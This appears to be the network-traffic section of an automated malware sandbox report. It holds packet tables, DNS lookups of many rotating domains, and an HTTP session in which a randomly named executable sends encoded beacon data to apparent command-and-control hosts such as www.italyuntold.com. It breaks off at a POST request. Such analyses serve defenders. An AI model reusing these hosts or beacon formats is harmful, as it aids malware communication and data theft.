                                              Jul 21, 2024 13:33:19.875340939 CEST804973713.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:19.875556946 CEST804973713.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:19.877840042 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.881659031 CEST4973780192.168.2.713.248.169.48
                                              Jul 21, 2024 13:33:19.888077974 CEST804973713.248.169.48192.168.2.7
                                              Jul 21, 2024 13:33:25.247976065 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:25.253447056 CEST8049738148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:25.256618023 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:25.259702921 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:25.264661074 CEST8049738148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:25.839411974 CEST8049738148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:25.839447975 CEST8049738148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:25.839596987 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:26.770711899 CEST4973880192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:27.789741039 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:27.794945955 CEST8049739148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:27.795124054 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:27.797679901 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:27.806674957 CEST8049739148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:28.376972914 CEST8049739148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:28.377017021 CEST8049739148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:28.377077103 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:29.301806927 CEST4973980192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.321650982 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.326850891 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.326926947 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.329560041 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.335411072 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.335844040 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.907619953 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.957987070 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:30.970911980 CEST8049740148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:30.970977068 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:31.833048105 CEST4974080192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:32.852381945 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:32.857469082 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:32.857542992 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:32.859684944 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:32.864595890 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:33.452344894 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:33.452486992 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:33.452707052 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:33.457695961 CEST4974180192.168.2.7148.135.97.125
                                              Jul 21, 2024 13:33:33.462591887 CEST8049741148.135.97.125192.168.2.7
                                              Jul 21, 2024 13:33:38.573777914 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:38.578938961 CEST80497423.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:38.579030037 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:38.620356083 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:38.626584053 CEST80497423.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:39.035942078 CEST80497423.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:39.035999060 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:40.133742094 CEST4974280192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:40.342889071 CEST80497423.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:41.148580074 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:41.153721094 CEST80497433.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:41.153810978 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:41.155921936 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:41.162103891 CEST80497433.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:41.622107983 CEST80497433.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:41.622206926 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:42.661323071 CEST4974380192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:42.666537046 CEST80497433.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:43.681679010 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:43.686969995 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:43.687130928 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:43.689687014 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:43.696441889 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:43.697105885 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:44.168028116 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:44.168092012 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:45.195862055 CEST4974480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:45.201056957 CEST80497443.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.211944103 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.217015982 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.217087030 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.219213963 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.224241018 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.713113070 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.714061975 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:46.714144945 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.716202974 CEST4974580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:46.721709013 CEST80497453.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:51.793781996 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:51.799824953 CEST80497463.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:51.801956892 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:51.806200027 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:51.811088085 CEST80497463.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:52.269068956 CEST80497463.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:52.269179106 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:53.317495108 CEST4974680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:53.324559927 CEST80497463.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:54.340904951 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:54.345868111 CEST80497473.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:54.345952034 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:54.348809958 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:54.353729010 CEST80497473.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:54.823460102 CEST80497473.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:54.823522091 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:55.864392996 CEST4974780192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:55.869822025 CEST80497473.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.048388958 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:57.143119097 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.143825054 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:57.177315950 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:57.182516098 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.182558060 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.640460014 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:57.640564919 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:58.696067095 CEST4974880192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:58.701960087 CEST80497483.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:59.805212021 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:59.811925888 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:33:59.812052965 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:59.851136923 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:33:59.856188059 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:00.273647070 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:00.273670912 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:00.273874998 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:00.278765917 CEST4974980192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:00.283608913 CEST80497493.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:22.737692118 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:22.743390083 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:22.743470907 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:22.745959997 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:22.751050949 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:23.462435961 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:23.462511063 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:23.464427948 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:23.465745926 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:23.688779116 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:23.688864946 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:24.255106926 CEST4975080192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:24.260060072 CEST804975084.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:25.273562908 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:25.279180050 CEST804975184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:25.281816959 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:25.285720110 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:25.290709972 CEST804975184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:25.767788887 CEST804975184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:25.769793987 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:26.786590099 CEST4975180192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:26.791783094 CEST804975184.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:27.805179119 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:27.810173035 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:27.813821077 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:27.816030025 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:27.820879936 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:27.820986986 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:28.308729887 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:28.308829069 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:30.692651987 CEST4975280192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:30.810031891 CEST804975284.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:31.711541891 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:31.718132973 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:31.718240023 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:31.720243931 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:31.725936890 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.187755108 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.187872887 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188050032 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.188110113 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188184977 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188218117 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188234091 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188251019 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188268900 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188291073 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.188374043 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.188410044 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.188915968 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:32.189819098 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.193159103 CEST4975380192.168.2.784.32.84.32
                                              Jul 21, 2024 13:34:32.198060989 CEST804975384.32.84.32192.168.2.7
                                              Jul 21, 2024 13:34:37.235779047 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:37.241127968 CEST80497543.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:37.241337061 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:37.243309021 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:37.248372078 CEST80497543.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:37.716063023 CEST80497543.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:37.716135025 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:38.756321907 CEST4975480192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:38.761738062 CEST80497543.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:39.773868084 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:39.780942917 CEST80497553.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:39.781039953 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:39.783036947 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:39.787950993 CEST80497553.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:40.241102934 CEST80497553.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:40.241250992 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:41.286506891 CEST4975580192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:41.291918993 CEST80497553.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:42.305948019 CEST4975680192.168.2.73.33.130.190
                                              Jul 21, 2024 13:34:42.311034918 CEST80497563.33.130.190192.168.2.7
                                              Jul 21, 2024 13:34:42.311299086 CEST4975680192.168.2.73.33.130.190
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                              Jul 21, 2024 13:34:05.291845083 CEST5750453192.168.2.71.1.1.1
                                              Jul 21, 2024 13:34:05.300380945 CEST53575041.1.1.1192.168.2.7
                                              Jul 21, 2024 13:34:11.866059065 CEST5083253192.168.2.71.1.1.1
                                              Jul 21, 2024 13:34:12.086209059 CEST53508321.1.1.1192.168.2.7
                                              Jul 21, 2024 13:34:22.681647062 CEST6335253192.168.2.71.1.1.1
                                              Jul 21, 2024 13:34:22.734564066 CEST53633521.1.1.1192.168.2.7
                                              Jul 21, 2024 13:34:37.212033033 CEST5865253192.168.2.71.1.1.1
                                              Jul 21, 2024 13:34:37.232394934 CEST53586521.1.1.1192.168.2.7
                                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                               Jul 21, 2024 13:31:04.937668085 CEST | 192.168.2.7 | 1.1.1.1 | 0x40fa | Standard query (0) | www.marktuana.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:09.962385893 CEST | 192.168.2.7 | 1.1.1.1 | 0x7ec3 | Standard query (0) | www.italyuntold.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:30.570785046 CEST | 192.168.2.7 | 1.1.1.1 | 0xae84 | Standard query (0) | www.funnelkakes.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:44.821547985 CEST | 192.168.2.7 | 1.1.1.1 | 0x9740 | Standard query (0) | www.shiybalinks.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:58.217155933 CEST | 192.168.2.7 | 1.1.1.1 | 0xbba7 | Standard query (0) | www.olhadeputat.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:12.133591890 CEST | 192.168.2.7 | 1.1.1.1 | 0x65c9 | Standard query (0) | www.jleabres.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:31.820980072 CEST | 192.168.2.7 | 1.1.1.1 | 0x15b6 | Standard query (0) | www.evoolihubs.shop | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:44.977571011 CEST | 192.168.2.7 | 1.1.1.1 | 0xdf17 | Standard query (0) | www.fardehb.top | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:58.513370991 CEST | 192.168.2.7 | 1.1.1.1 | 0x3110 | Standard query (0) | www.sehraji.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:11.695928097 CEST | 192.168.2.7 | 1.1.1.1 | 0x56b9 | Standard query (0) | www.ecoaxion.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:24.900346994 CEST | 192.168.2.7 | 1.1.1.1 | 0xb308 | Standard query (0) | www.809934.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:38.550190926 CEST | 192.168.2.7 | 1.1.1.1 | 0xb6e | Standard query (0) | www.betano627.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:51.728717089 CEST | 192.168.2.7 | 1.1.1.1 | 0xd6b | Standard query (0) | www.nationsincbook.com | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:05.291845083 CEST | 192.168.2.7 | 1.1.1.1 | 0x367 | Standard query (0) | www | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:11.866059065 CEST | 192.168.2.7 | 1.1.1.1 | 0x991d | Standard query (0) | www | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:22.681647062 CEST | 192.168.2.7 | 1.1.1.1 | 0x14cd | Standard query (0) | www.karak-networks.online | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:37.212033033 CEST | 192.168.2.7 | 1.1.1.1 | 0xcf97 | Standard query (0) | www.gtprivatewealth.com | A (IP address) | IN (0x0001) | false
                                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                               Jul 21, 2024 13:31:04.948348999 CEST | 1.1.1.1 | 192.168.2.7 | 0x40fa | Name error (3) | www.marktuana.com | none | none | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:10.000205994 CEST | 1.1.1.1 | 192.168.2.7 | 0x7ec3 | No error (0) | www.italyuntold.com | italyuntold.com | | CNAME (Canonical name) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:10.000205994 CEST | 1.1.1.1 | 192.168.2.7 | 0x7ec3 | No error (0) | italyuntold.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:10.000205994 CEST | 1.1.1.1 | 192.168.2.7 | 0x7ec3 | No error (0) | italyuntold.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:30.608046055 CEST | 1.1.1.1 | 192.168.2.7 | 0xae84 | No error (0) | www.funnelkakes.com | funnelkakes.com | | CNAME (Canonical name) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:30.608046055 CEST | 1.1.1.1 | 192.168.2.7 | 0xae84 | No error (0) | funnelkakes.com | | 76.223.67.189 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:30.608046055 CEST | 1.1.1.1 | 192.168.2.7 | 0xae84 | No error (0) | funnelkakes.com | | 13.248.213.45 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:44.838875055 CEST | 1.1.1.1 | 192.168.2.7 | 0x9740 | No error (0) | www.shiybalinks.com | shiybalinks.com | | CNAME (Canonical name) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:44.838875055 CEST | 1.1.1.1 | 192.168.2.7 | 0x9740 | No error (0) | shiybalinks.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:44.838875055 CEST | 1.1.1.1 | 192.168.2.7 | 0x9740 | No error (0) | shiybalinks.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:58.263907909 CEST | 1.1.1.1 | 192.168.2.7 | 0xbba7 | No error (0) | www.olhadeputat.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:31:58.263907909 CEST | 1.1.1.1 | 192.168.2.7 | 0xbba7 | No error (0) | www.olhadeputat.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:12.319546938 CEST | 1.1.1.1 | 192.168.2.7 | 0x65c9 | No error (0) | www.jleabres.com | | 103.168.172.37 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:12.319546938 CEST | 1.1.1.1 | 192.168.2.7 | 0x65c9 | No error (0) | www.jleabres.com | | 103.168.172.52 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:31.836699009 CEST | 1.1.1.1 | 192.168.2.7 | 0x15b6 | No error (0) | www.evoolihubs.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:31.836699009 CEST | 1.1.1.1 | 192.168.2.7 | 0x15b6 | No error (0) | www.evoolihubs.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:45.296749115 CEST | 1.1.1.1 | 192.168.2.7 | 0xdf17 | No error (0) | www.fardehb.top | | 203.161.41.207 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:58.600404978 CEST | 1.1.1.1 | 192.168.2.7 | 0x3110 | No error (0) | www.sehraji.com | sehraji.com | | CNAME (Canonical name) | IN (0x0001) | false
                                               Jul 21, 2024 13:32:58.600404978 CEST | 1.1.1.1 | 192.168.2.7 | 0x3110 | No error (0) | sehraji.com | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:11.733429909 CEST | 1.1.1.1 | 192.168.2.7 | 0x56b9 | No error (0) | www.ecoaxion.com | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:11.733429909 CEST | 1.1.1.1 | 192.168.2.7 | 0x56b9 | No error (0) | www.ecoaxion.com | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:25.242173910 CEST | 1.1.1.1 | 192.168.2.7 | 0xb308 | No error (0) | www.809934.com | | 148.135.97.125 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:38.564378977 CEST | 1.1.1.1 | 192.168.2.7 | 0xb6e | No error (0) | www.betano627.com | betano627.com | | CNAME (Canonical name) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:38.564378977 CEST | 1.1.1.1 | 192.168.2.7 | 0xb6e | No error (0) | betano627.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:38.564378977 CEST | 1.1.1.1 | 192.168.2.7 | 0xb6e | No error (0) | betano627.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:51.789525032 CEST | 1.1.1.1 | 192.168.2.7 | 0xd6b | No error (0) | www.nationsincbook.com | nationsincbook.com | | CNAME (Canonical name) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:51.789525032 CEST | 1.1.1.1 | 192.168.2.7 | 0xd6b | No error (0) | nationsincbook.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:33:51.789525032 CEST | 1.1.1.1 | 192.168.2.7 | 0xd6b | No error (0) | nationsincbook.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:05.300380945 CEST | 1.1.1.1 | 192.168.2.7 | 0x367 | Name error (3) | www | none | none | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:12.086209059 CEST | 1.1.1.1 | 192.168.2.7 | 0x991d | Name error (3) | www | none | none | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:22.734564066 CEST | 1.1.1.1 | 192.168.2.7 | 0x14cd | No error (0) | www.karak-networks.online | karak-networks.online | | CNAME (Canonical name) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:22.734564066 CEST | 1.1.1.1 | 192.168.2.7 | 0x14cd | No error (0) | karak-networks.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:37.232394934 CEST | 1.1.1.1 | 192.168.2.7 | 0xcf97 | No error (0) | www.gtprivatewealth.com | gtprivatewealth.com | | CNAME (Canonical name) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:37.232394934 CEST | 1.1.1.1 | 192.168.2.7 | 0xcf97 | No error (0) | gtprivatewealth.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                               Jul 21, 2024 13:34:37.232394934 CEST | 1.1.1.1 | 192.168.2.7 | 0xcf97 | No error (0) | gtprivatewealth.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               0 | 192.168.2.7 | 49704 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 21, 2024 13:31:10.021895885 CEST | 449 | OUT | GET /5yb0/?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.italyuntold.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                               Jul 21, 2024 13:31:10.500219107 CEST | 412 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:31:10 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI8"}</script></head></html>


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               1 | 192.168.2.7 | 49706 | 76.223.67.189 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 21, 2024 13:31:30.617557049 CEST | 718 | OUT | POST /sgjw/ HTTP/1.1
